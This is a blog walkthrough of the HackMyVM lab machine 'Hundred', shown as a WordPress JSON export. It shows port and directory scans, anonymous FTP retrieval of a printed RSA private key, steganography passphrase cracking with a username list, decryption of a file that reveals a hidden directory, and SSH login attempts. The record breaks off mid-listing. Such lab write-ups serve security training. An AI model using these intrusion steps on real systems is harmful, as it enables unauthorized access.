{"id":620,"date":"2024-04-24T14:05:29","date_gmt":"2024-04-24T06:05:29","guid":{"rendered":"http:\/\/162.14.82.114\/?p=620"},"modified":"2024-04-24T14:05:29","modified_gmt":"2024-04-24T06:05:29","slug":"hmv-_-hundred","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/620\/04\/24\/2024\/","title":{"rendered":"hmv[-_-]Hundred"},"content":{"rendered":"<h1>Hundred<\/h1>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ sudo nmap -sS 192.168.0.159\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-24 01:16 EDT\nNmap scan report for hundred (192.168.0.159)\nHost is up (0.000060s latency).\nNot shown: 997 closed tcp ports (reset)\nPORT   STATE SERVICE\n21\/tcp open  ftp\n22\/tcp open  ssh\n80\/tcp open  http\nMAC Address: 08:00:27:4E:15:8F (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.43 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ rustscan -a 192.168.0.159 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.159:21\nOpen 192.168.0.159:22\nOpen 192.168.0.159:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-24 01:17 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nInitiating Ping Scan at 01:17\nScanning 192.168.0.159 [2 ports]\nCompleted Ping Scan at 01:17, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 01:17\nCompleted Parallel DNS resolution of 1 host. at 01:17, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 01:17\nScanning hundred (192.168.0.159) [3 ports]\nDiscovered open port 21\/tcp on 192.168.0.159\nDiscovered open port 22\/tcp on 192.168.0.159\nDiscovered open port 80\/tcp on 192.168.0.159\nCompleted Connect Scan at 01:17, 0.00s elapsed (3 total ports)\nInitiating Service scan at 01:17\nScanning 3 services on hundred (192.168.0.159)\nCompleted Service scan at 01:17, 6.12s elapsed (3 services on 1 host)\nNSE: Script scanning 192.168.0.159.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:17\nNSE: [ftp-bounce 192.168.0.159:21] PORT response: 500 Illegal PORT command.\nCompleted NSE at 01:17, 0.70s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNmap scan report for hundred (192.168.0.159)\nHost is up, received syn-ack (0.00046s latency).\nScanned at 2024-04-24 01:17:02 EDT for 7s\n\nPORT   STATE SERVICE REASON  
VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.0.143\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 1\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rwxrwxrwx    1 0        0             435 Aug 02  2021 id_rsa [NSE: writeable]\n| -rwxrwxrwx    1 1000     1000         1679 Aug 02  2021 id_rsa.pem [NSE: writeable]\n| -rwxrwxrwx    1 1000     1000          451 Aug 02  2021 id_rsa.pub [NSE: writeable]\n|_-rwxrwxrwx    1 0        0             187 Aug 02  2021 users.txt [NSE: writeable]\n22\/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 ef:28:1f:2a:1a:56:49:9d:77:88:4f:c4:74:56:0f:5c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbKM571Elw344\/eLnr7NhTAOVHtqhEITrCuF0mFc5\/ZiSN54vnhfTrt6JW8mj09y8vOTbsC+nhdoC6vFFGHAesozqQcndm3LXzwz4yIujhaF3IljcS0hdKGniUY1\/sHW680oixdOEHQT8cSeEosAVNc1To4YwNo1hYUsuhbNtD\/dG4WIIybOHeWgUrEHfnu4Q+Q7K3kevOy3b4aSZfc43Qa7nezkrjzRH3iy5tyMQV5SWdow4Jb25z3zqJCBVdB0UkYWzB0scx95N9OSh5g\/Ph799VKKgtkfyBNEyPTQ7mbK1ZwsPTWOCAHB33Y4j+rgQ9DREgZsNtU0KBbU9Bu8Sd\n|   256 1d:8d:a0:2e:e9:a3:2d:a1:4d:ec:07:41:75:ce:47:0e (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHJc9irXjsz0dU9g6bOq6koDsj8BPZ30XoWjK\/E9M+mZ6gJdPlnEVvd9KHiRP+QiPjc1NZfVbIUy4RiX\/ev1Iw8=\n|   256 06:80:3b:fc:c5:f7:7d:c5:58:26:83:c4:f7:7e:a3:d9 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEAOTtpmhQ63cGzZAoANc8fAevbCpwQ7q8ymO+TP7Gp\/\n80\/tcp open  http    syn-ack nginx 1.14.2\n|_http-server-header: nginx\/1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Site doesn&#039;t have a title (text\/html).\nService Info: OSs: 
Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.47 seconds<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.159\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.159\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              jpg,txt,html,php,zip,bak\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 242]\n\/logo.jpg             (Status: 200) [Size: 7277]\nProgress: 1543920 \/ 1543927 
(100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<p>View the page source:<\/p>\n<pre><code class=\"language-html\">&lt;style&gt;\n.center {\n  display: block;\n  margin-left: auto;\n  margin-right: auto;\n  key: h4ckb1tu5.enc;\n  width: 50%;\n}\n&lt;\/style&gt;\n\n&lt;img src=&quot;logo.jpg&quot; class=&quot;center&quot;&gt; \n&lt;h1&gt;Thank you ALL!&lt;\/h1&gt;\n&lt;h1&gt;100 f*cking VMs!!&lt;\/h1&gt;\n\n&lt;!-- l4nr3n, nice dir.--&gt;<\/code><\/pre>\n<p>This reveals a sensitive directory, <code>l4nr3n<\/code>, and a key, <code>h4ckb1tu5.enc<\/code>.<\/p>\n<h3>Probing Sensitive Services<\/h3>\n<p>Try an anonymous <code>ftp<\/code> login:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ftp 192.168.0.159                               \nConnected to 192.168.0.159.\n220 (vsFTPd 3.0.3)\nName (192.168.0.159:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote 
system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; pwd\nRemote directory: \/\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||42789|)\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        113          4096 Aug 02  2021 .\ndrwxr-xr-x    2 0        113          4096 Aug 02  2021 ..\n-rwxrwxrwx    1 0        0             435 Aug 02  2021 id_rsa\n-rwxrwxrwx    1 1000     1000         1679 Aug 02  2021 id_rsa.pem\n-rwxrwxrwx    1 1000     1000          451 Aug 02  2021 id_rsa.pub\n-rwxrwxrwx    1 0        0             187 Aug 02  2021 users.txt\n226 Directory send OK.\nftp&gt; get users.txt\nlocal: users.txt remote: users.txt\n229 Entering Extended Passive Mode (|||61643|)\n150 Opening BINARY mode data connection for users.txt (187 bytes).\n100% |***********************************************************************************************************|   187        7.78 KiB\/s    00:00 ETA\n226 Transfer complete.\n187 bytes received in 00:00 (7.58 KiB\/s)\nftp&gt; get id_rsa\nlocal: id_rsa remote: id_rsa\n229 Entering Extended Passive Mode (|||43755|)\n150 Opening BINARY mode data connection for id_rsa (435 bytes).\n100% |***********************************************************************************************************|   435       12.69 KiB\/s    00:00 ETA\n226 Transfer complete.\n435 bytes received in 00:00 (12.48 KiB\/s)\nftp&gt; get id_rsa.pem\nlocal: id_rsa.pem remote: id_rsa.pem\n229 Entering Extended Passive Mode (|||20649|)\n150 Opening BINARY mode data connection for id_rsa.pem (1679 bytes).\n100% |***********************************************************************************************************|  1679        1.86 MiB\/s    00:00 ETA\n226 Transfer complete.\n1679 bytes received in 00:00 (1.12 MiB\/s)\nftp&gt; get id_rsa.pub\nlocal: id_rsa.pub remote: id_rsa.pub\n229 Entering Extended Passive Mode (|||36855|)\n150 Opening BINARY mode data connection for id_rsa.pub (451 bytes).\n100% 
|***********************************************************************************************************|   451      764.63 KiB\/s    00:00 ETA\n226 Transfer complete.\n451 bytes received in 00:00 (470.54 KiB\/s)\nftp&gt; exit\n221 Goodbye.<\/code><\/pre>\n<p>Take a look at what we got:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ls -la\ntotal 24\ndrwxr-xr-x  2 kali kali 4096 Apr 24 01:20 .\ndrwxr-xr-x 66 kali kali 4096 Apr 24 01:16 ..\n-rw-r--r--  1 kali kali  435 Aug  2  2021 id_rsa\n-rw-r--r--  1 kali kali 1679 Aug  2  2021 id_rsa.pem\n-rw-r--r--  1 kali kali  451 Aug  2  2021 id_rsa.pub\n-rw-r--r--  1 kali kali  187 Aug  2  2021 users.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa     \n  \/ \\\n    \/ _ \\\n   | \/ \\ |\n   ||   || _______\n   ||   || |\\     \\\n   ||   || ||\\     \\\n   ||   || || \\    |\n   ||   || ||  \\__\/\n   ||   || ||   ||\n    \\\\_\/ \\_\/ \\_\/\/\n   \/   _     _   \\\n  \/               \\\n  |    O     O    |\n  |   \\  ___  \/   |                           \n \/     \\ \\_\/ \/     \\\n\/  -----  |  --\\    \\\n|     \\__\/|\\__\/ \\   |\n\\       |_|_|       \/\n \\_____       _____\/\n       \\     \/\n       |     |\n-------------------------\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa.pem \n-----BEGIN RSA PRIVATE 
KEY-----\nMIIEpAIBAAKCAQEAwsrHORyA+mG6HS9ZmZwzPmKHrHhA0\/kKCwNjUG8rmPVupv73\nmUsewpoGvYB9L9I7pUAsMscAb5MVo89d4b0z2RnXDD1fh6mKlTJmcNwWCnA1PgD+\nOwqewshpkCBhCV6O2P6dktfA8UI\/uqF6uT4QISU4ksriN16cOm\/89jHadetB8dCe\nh3Rx6HrFNccY8aiDRSA9meqz7YGE2+lJ\/NtwtndUkzzxKxuKC6z4gG780tZHhg83\nxVwZ9bxPyHfGqHWmV4yGsAgp7mot7pg9VzffnP6DAVnbReDDbhNLcnfVXEkBv8SQ\nL7OFIiKxJpoa1ADqGffA5LOPFdYKbbCFMictQQIDAQABAoIBAE4Q6IDp\/ILcEbPK\nmzUl1Z+l60visdCCGVVKmU3OEAHwMtV4j5B++6fwBM2Dpig5MDBNJKmA+Zq9rsmE\nvNJQemwCoB3Gpvd+qgybM1T9z1OFnsDnsvvEiNX1beEWKO2RWNx8RnhoQWovK81H\nFCETT3GJMkAaUUjxgNkmspGUb0IcP4YR61jpNy8thMLz8FQV8XqNSf4DSd9+8wrm\nFBFDFzso6zcBtsY6\/nDueaVfLsequU1Fdhh3itC6rPXync\/EWN0HJtaiKEVAytYE\ncvl1hVpRVhGZGjPqNQSPcknO0K2b22anRoiSpBoCzaopbSZHySFgcZM8oxGgw35j\nYpS1ULUCgYEA+1Se5s4AzsOX\/3RRwwF9Was\/\/oHU1N2JnJRetF9tjeFu8MEMnSec\na3bcPy+CZHB8oVnoyh647IObzPUjCgMxdyTLdfGmQ8RgzXhwYeQRe+ethrT\/Ra26\n7m+R+3838k5ZTKnwjBPreV\/i2AmwZYDPT2S5q5b7m5Cr4QTfsaScaKsCgYEAxmk\/\nxzu2XO8YmE+8R62nWdLPMaj4E5IPkT3uCA8G24KGSSyK29OGZ02RI8qxWkdqMxKJ\nrTDrQJ\/4oU6108Vhay0tyFswbNn0ymlHAhPKxXNr0xHkC6rCnDEnn6W7bspTxxyk\n9OUtl2UemtnEKRm3qu9Rc1qLFW0\/Zhxw3ovgWcMCgYEAka6HPPoD9dXicSyXiBWA\n900QlxHisFCJx70o+ByogClACUWdbirbvF71Y5rCVj3twAlBqocMYewXj0I4wUEA\nlzM4zHD6EyXthqxdWCC\/EbdFGmQn49fEFxmM4N7pKwbHNGz9BfU19PDjqJ5VJUD4\n6ehUx2WJCq9dMd2FXI8yKmkCgYAMBBnBtiMQM8a4irOrX5\/v961mo4YKoWDh+e8t\ne8N9jcUWL2VldMUCApeUpFTjU8nht\/CwlXLZ4hZLppmqbpy8weqw5JzlKroBfCi5\nvnscRCY2jTHTZw8MKInuyDm2tvgl6d0vm6WMMqqM1D1mA9G0v3OeWdBshsY9J+HK\nCIyYwwKBgQDEXoZ+lZKyPUBSgcE+b52U2Dj9GAPKPUDZpsCbUebftZknOk\/HelF1\nwiWWDjni1ILVSfWIR4\/nvosJPa+39WDv+dFt3bJdcUA3SL2acW3MGVPC6abZWwSo\nizXrZm8h0ZSuXyU\/uuT3BCJt77HyN2cPZrqccPwanS9du6zrX0u2yQ==\n-----END RSA PRIVATE KEY-----\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa.pub \n-----BEGIN PUBLIC 
KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwsrHORyA+mG6HS9ZmZwz\nPmKHrHhA0\/kKCwNjUG8rmPVupv73mUsewpoGvYB9L9I7pUAsMscAb5MVo89d4b0z\n2RnXDD1fh6mKlTJmcNwWCnA1PgD+OwqewshpkCBhCV6O2P6dktfA8UI\/uqF6uT4Q\nISU4ksriN16cOm\/89jHadetB8dCeh3Rx6HrFNccY8aiDRSA9meqz7YGE2+lJ\/Ntw\ntndUkzzxKxuKC6z4gG780tZHhg83xVwZ9bxPyHfGqHWmV4yGsAgp7mot7pg9Vzff\nnP6DAVnbReDDbhNLcnfVXEkBv8SQL7OFIiKxJpoa1ADqGffA5LOPFdYKbbCFMict\nQQIDAQAB\n-----END PUBLIC KEY-----\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat users.txt \n--- SNIP ---\nnoname\nroelvb\nch4rm\nmarcioapm\nisen\nsys7em\nchicko\ntasiyanci\nluken\nalienum\nlinked\ntatayoyo\n0xr0n1n\nexploiter\nkanek180\ncromiphi\nsoftyhack\nb4el7d\nval1d\n--- SNIP ---\n\nThanks!\nhmv<\/code><\/pre>\n<h3>Sensitive Directory<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ wget http:\/\/192.168.0.159\/logo.jpg                  \n--2024-04-24 01:29:09--  http:\/\/192.168.0.159\/logo.jpg\nConnecting to 192.168.0.159:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 7277 (7.1K) [image\/jpeg]\nSaving to: \u2018logo.jpg\u2019\n\nlogo.jpg                              100%[=========================================================================&gt;]   7.11K  --.-KB\/s    in 0s      \n\n2024-04-24 01:29:09 (892 MB\/s) - \u2018logo.jpg\u2019 saved [7277\/7277]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt logo.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Progress: 99.94% (133.4 MB)           \n[!] 
error: Could not find a valid passphrase.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ stegseek -wl users.txt logo.jpg                       \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: &quot;cromiphi&quot;\n[i] Original filename: &quot;toyou.txt&quot;.\n[i] Extracting to &quot;logo.jpg.out&quot;.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat logo.jpg.out             \nd4t4s3c#1<\/code><\/pre>\n<p>Then:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ curl http:\/\/192.168.0.159\/l4nr3n                                                                                                        \n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;404 Not Found&lt;\/title&gt;&lt;\/head&gt;\n&lt;body bgcolor=&quot;white&quot;&gt;\n&lt;center&gt;&lt;h1&gt;404 Not Found&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.14.2&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ wget http:\/\/192.168.0.159\/h4ckb1tu5.enc               \n--2024-04-24 01:31:06--  http:\/\/192.168.0.159\/h4ckb1tu5.enc\nConnecting to 192.168.0.159:80... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 256 [application\/octet-stream]\nSaving to: \u2018h4ckb1tu5.enc\u2019\n\nh4ckb1tu5.enc                         100%[=========================================================================&gt;]     256  --.-KB\/s    in 0s      \n\n2024-04-24 01:31:06 (65.8 MB\/s) - \u2018h4ckb1tu5.enc\u2019 saved [256\/256]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat h4ckb1tu5.enc               \n\ufffdJzU(}\ufffdD\ufffdH\ufffd\ufffd\ufffd\ufffd\ufffd\u04ca\ufffd\ufffdTfV\ufffd\ufffd\ufffd\u00f5\ufffdH\ufffd\ufffd\ufffdaL\ufffd$\ufffd\ufffdEq\ufffd2\ufffd)]`J\ufffd\ufffd\ufffd2H\ufffd\u067d~\ufffd\ufffd\ufffd\ufffd;2\ufffd&quot;\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n                                                                      0l\n                                                                        \ufffdu\ufffdk\n                                                                            \ufffd\ufffd\ufffdUl\ufffd\ufffd.C\ufffd1\ufffdQ\ufffdR\ufffdW\u03b4\ufffdj&gt;\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n\ufffd\u02f4\u059a}\ufffd\ufffdK\ufffd\ufffd\ufffd\ufffdJ\ufffd\ufffd\ufffd\ufffd\ufffdi[?\ufffd\ufffd\ufffd\ufffd$\ufffd\u070e&quot;\n                           \ufffd\ufffd\ufffdx\ufffd\ufffd\ufffd\ufffdJ\ufffd\ufffd\ufffd\ufffd\ufffd=q\ufffdZq\ufffd\ufffd4!\ufffdK\ufffd\ufffde\ufffdP\n                                                         J{\ufffd\ufffdQ\ufffd\ufffd\ufffd\ufffd3\ufffdm\ufffdQ\ufffd\ufffdJ\ufffd\ufffd_)\ufffd\u0676\ufffdZ <\/code><\/pre>\n<p>With the key in hand, try decrypting it:<\/p>\n<p>Give it a try:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ openssl rsautl -decrypt -in h4ckb1tu5.enc -out decrypto.txt -inkey id_rsa.pem\nThe command rsautl was deprecated in version 3.0. 
Use &#039;pkeyutl&#039; instead.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ openssl pkeyutl -decrypt -in h4ckb1tu5.enc -out decrypto.txt -inkey id_rsa.pem \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat decrypto.txt \n\/softyhackb4el7dshelldredd<\/code><\/pre>\n<p>This yields a sensitive directory:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ curl http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;301 Moved Permanently&lt;\/title&gt;&lt;\/head&gt;\n&lt;body bgcolor=&quot;white&quot;&gt;\n&lt;center&gt;&lt;h1&gt;301 Moved Permanently&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.14.2&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ curl http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/\nHi boss.\nIs there --&gt; ...<\/code><\/pre>\n<h3>Scanning the New Directory<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ sudo dirsearch -u http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/ -e* -i 200,300-399 2&gt;\/dev\/null\n[sudo] password for kali: \n\n  _|. 
_ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/hundred\/reports\/http_192.168.0.159\/_softyhackb4el7dshelldredd__24-04-24_01-38-58.txt\n\nTarget: http:\/\/192.168.0.159\/\n\n[01:38:58] Starting: softyhackb4el7dshelldredd\/\n[01:39:22] 200 -    2KB - \/softyhackb4el7dshelldredd\/id_rsa\n\nTask Completed<\/code><\/pre>\n<h3>Key-Based Login<\/h3>\n<p>Download it and try logging in with the key:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ wget http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/id_rsa\n--2024-04-24 01:42:34--  http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/id_rsa\nConnecting to 192.168.0.159:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1876 (1.8K) [application\/octet-stream]\nSaving to: \u2018id_rsa.1\u2019\n\nid_rsa.1                              100%[=========================================================================&gt;]   1.83K  --.-KB\/s    in 0s      \n\n2024-04-24 01:42:34 (331 MB\/s) - \u2018id_rsa.1\u2019 saved [1876\/1876]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ssh hmv@192.168.0.159 -i id_rsa \nThe authenticity of host &#039;192.168.0.159 (192.168.0.159)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:CiCK\/UJWUULl80syMwfpY3+G25hq7fX\/xTkHA61y2Ws.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.0.159&#039; (ED25519) to the list of known hosts.\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@         WARNING: UNPROTECTED PRIVATE KEY FILE!          
@\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\nPermissions 0644 for &#039;id_rsa&#039; are too open.\nIt is required that your private key files are NOT accessible by others.\nThis private key will be ignored.\nLoad key &quot;id_rsa&quot;: bad permissions\nhmv@192.168.0.159&#039;s password: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ chmod 600 id_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ssh hmv@192.168.0.159 -i id_rsa\nLoad key &quot;id_rsa&quot;: error in libcrypto\nhmv@192.168.0.159&#039;s password: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ vim id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa      \n  \/ \\\n    \/ _ \\\n   | \/ \\ |\n   ||   || _______\n   ||   || |\\     \\\n   ||   || ||\\     \\\n   ||   || || \\    |\n   ||   || ||  \\__\/\n   ||   || ||   ||\n    \\\\_\/ \\_\/ \\_\/\/\n   \/   _     _   \\\n  \/               \\\n  |    O     O    |\n  |   \\  ___  \/   |                           \n \/     \\ \\_\/ \/     \\\n\/  -----  |  --\\    \\\n|     \\__\/|\\__\/ \\   |\n\\       |_|_|       \/\n \\_____       _____\/\n       \\     \/\n       |     |\n-------------------------\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ls -la\ntotal 52\ndrwxr-xr-x  3 kali kali 4096 Apr 24 01:44 .\ndrwxr-xr-x 66 kali kali 4096 Apr 24 01:16 ..\n-rw-r--r--  1 kali kali   27 Apr 24 01:35 decrypto.txt\n-rw-r--r--  1 kali kali  256 Aug  2  2021 h4ckb1tu5.enc\n-rw-------  1 kali kali  435 Apr 24 01:44 id_rsa\n-rw-r--r--  1 kali kali 1876 Aug  2  2021 id_rsa.1\n-rw-r--r--  1 kali kali 1679 Aug  2  2021 id_rsa.pem\n-rw-r--r--  1 kali kali  451 Aug  2  2021 id_rsa.pub\n-rw-r--r--  1 kali kali 7277 Aug  2  2021 logo.jpg\n-rw-r--r--  1 kali kali   10 Apr 24 01:41 logo.jpg.out\ndrwxr-xr-x  3 root root 4096 Apr 24 01:38 reports\n-rw-r--r--  1 kali kali  187 Aug  2  
